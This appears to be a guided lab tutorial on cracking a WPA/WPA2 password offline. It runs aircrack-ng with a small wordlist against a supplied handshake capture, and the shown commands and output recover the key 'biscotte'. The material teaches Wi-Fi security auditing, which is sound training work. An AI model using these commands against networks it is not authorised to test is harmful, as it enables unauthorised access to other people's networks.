Introduction
In this lab, you will learn how to perform a dictionary attack against a WPA/WPA2 handshake. When a device connects to a WPA/WPA2 protected Wi-Fi network, a 4-way handshake occurs to authenticate the device. By capturing this handshake, it's possible to try and crack the network's password offline.
A dictionary attack is a method of breaking into a password-protected system by systematically entering every word in a list (called a dictionary or wordlist) as a password. We will use aircrack-ng, a powerful tool for Wi-Fi security auditing, to carry out this attack. You will be provided with a captured handshake file (.cap) and a wordlist to simulate a real-world scenario.
By the end of this lab, you will be able to use aircrack-ng to find a Wi-Fi password from a captured handshake file.
Locate the Captured Handshake .cap File
In this step, you will locate the pre-captured WPA handshake file. For this lab, a sample capture file named wpa_handshake.cap has been placed in your ~/project directory. This file contains the network traffic, including the essential 4-way handshake needed for the attack.
First, let's list the files in the current directory to confirm that the capture file is present. Use the ls -l command.
ls -l
You should see the wpa_handshake.cap file in the output, along with other files.
total 8
-rw-r--r-- 1 labex labex 11 Mar 25 10:00 rockyou.txt
-rw-r--r-- 1 labex labex 985 Mar 25 10:00 wpa_handshake.cap
Now that you have confirmed the presence of the capture file, you can proceed to the next step.
Find a Wordlist File such as rockyou.txt
In this step, you will find and inspect the wordlist file. A dictionary or wordlist is a simple text file that contains a list of potential passwords, one per line. aircrack-ng will use this list to test each password against the captured handshake.
A small wordlist named rockyou.txt has been created for you in the ~/project directory. Let's view its contents using the cat command.
cat rockyou.txt
The output will display the potential passwords contained in the file.
password
12345678
biscotte
qwerty
In a real-world scenario, wordlists can be massive, containing millions or even billions of passwords. For this lab, our small list contains the correct password, which will allow the attack to succeed quickly.
Construct the aircrack-ng Command with the .cap File
In this step, you will use aircrack-ng to inspect the capture file. Before launching the attack, it's good practice to check if the .cap file contains a valid WPA handshake. aircrack-ng can do this for you.
Run aircrack-ng and provide the capture file wpa_handshake.cap as an argument.
aircrack-ng wpa_handshake.cap
aircrack-ng will analyze the file and display information about the networks it finds.
Opening wpa_handshake.cap
Read 13 packets.
## BSSID ESSID Encryption
1 00:14:6C:7E:40:80 teddy WPA (1 handshake)
Choosing first network as target.
Opening wpa_handshake.cap
Please specify a dictionary (option -w).
Pay close attention to the line WPA (1 handshake). This confirms that a complete WPA handshake for the network "teddy" was successfully captured and is present in the file. This is the confirmation we need to proceed with the dictionary attack. The tool also prompts you to specify a dictionary, which you will do in the upcoming steps.
Specify the Wordlist using the -w Parameter
In this step, you will learn how to specify a wordlist for the attack using the -w parameter. This parameter tells aircrack-ng which file to use as its dictionary of potential passwords.
The full command syntax is aircrack-ng <capture_file> -w <wordlist_file>.
To understand how it works, let's first try to run the command with a wordlist that does not exist. This will help you see how aircrack-ng handles errors. Try running the command with nonexistent.txt as the wordlist.
aircrack-ng wpa_handshake.cap -w nonexistent.txt
You will receive an error message because the file cannot be found.
Opening wpa_handshake.cap
Read 13 packets.
## BSSID ESSID Encryption
1 00:14:6C:7E:40:80 teddy WPA (1 handshake)
Choosing first network as target.
Opening wpa_handshake.cap
The file 'nonexistent.txt' doesn't exist.
Please specify a dictionary (option -w).
This confirms that aircrack-ng requires a valid, existing file for the -w parameter. In the next step, you will use the correct wordlist file to run the attack.
Run the Attack and Analyze the 'KEY FOUND' Output
In this step, you will run the full dictionary attack with the correct wordlist and analyze the output to find the key. Now that you know how to specify the capture file and the wordlist, you can launch the attack.
Execute the aircrack-ng command, providing wpa_handshake.cap as the capture file and rockyou.txt as the wordlist.
aircrack-ng wpa_handshake.cap -w rockyou.txt
aircrack-ng will now start. It will test each password from rockyou.txt against the handshake. Since our wordlist is small and contains the correct password, the process will be very fast.
Opening wpa_handshake.cap
Read 13 packets.
## BSSID ESSID Encryption
1 00:14:6C:7E:40:80 teddy WPA (1 handshake)
Choosing first network as target.
Opening wpa_handshake.cap
[00:00:00] 3 keys tested (23.08 k/s)
KEY FOUND! [ biscotte ]
Master Key : ED A5 79 22 E5 5F 56 64 74 CB 89 98 44 6A 18 25
E0 E3 44 86 8A F3 89 84 55 4A D3 94 03 19 28 79
Transient Key : 6A 84 A9 58 52 2E 61 30 62 50 2B 88 46 1B 2A 8A
...
EAPOL HMAC : 4E 1A E7 74 52 86 C5 29 A3 43 54 B2 1B 2D 34 18
The most important line in the output is KEY FOUND! [ biscotte ]. This indicates that the attack was successful. aircrack-ng tested the passwords from the wordlist and found that biscotte is the correct password for the "teddy" network.
Summary
In this lab, you successfully performed a dictionary attack on a WPA handshake using aircrack-ng.
You learned how to:
- Locate and identify a capture file (
.cap) and a wordlist. - Use
aircrack-ngto inspect a capture file and confirm the presence of a WPA handshake. - Use the
-wparameter to specify a wordlist for the attack. - Execute the dictionary attack and interpret the results to find the network key.
This exercise demonstrates a fundamental technique in Wi-Fi security auditing and highlights the importance of using strong, complex passwords that are not easily guessed by dictionary attacks.